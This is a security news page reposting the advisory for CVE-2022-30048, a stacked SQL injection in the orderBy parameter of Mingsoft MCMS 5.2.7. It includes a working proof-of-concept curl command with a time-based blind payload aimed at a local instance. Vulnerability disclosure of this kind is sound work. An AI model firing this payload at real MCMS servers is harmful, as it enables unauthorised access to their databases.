Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-30048: Mingsoft MCMS v5.2.7 SQL注入【前台】 · Issue #I54VG0 · 铭飞/MCMS - Gitee.com

Mingsoft MCMS 5.2.7 was discovered to contain a SQL injection vulnerability in /mdiy/dict/list URI via orderBy parameter.

CVE
#sql#vulnerability#git

/mdiy/dict/list路由的orderBy参数存在堆叠SQL注入

证明

curl -w "%{time_total}\n" -i -I -X $'GET' $'http://127.0.0.1:8080/mdiy/dict/list?dictType=1&orderBy=1)a;select/**/if(substring((select/**/database()),1,4)=\'mcms\',sleep(3),1);'

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907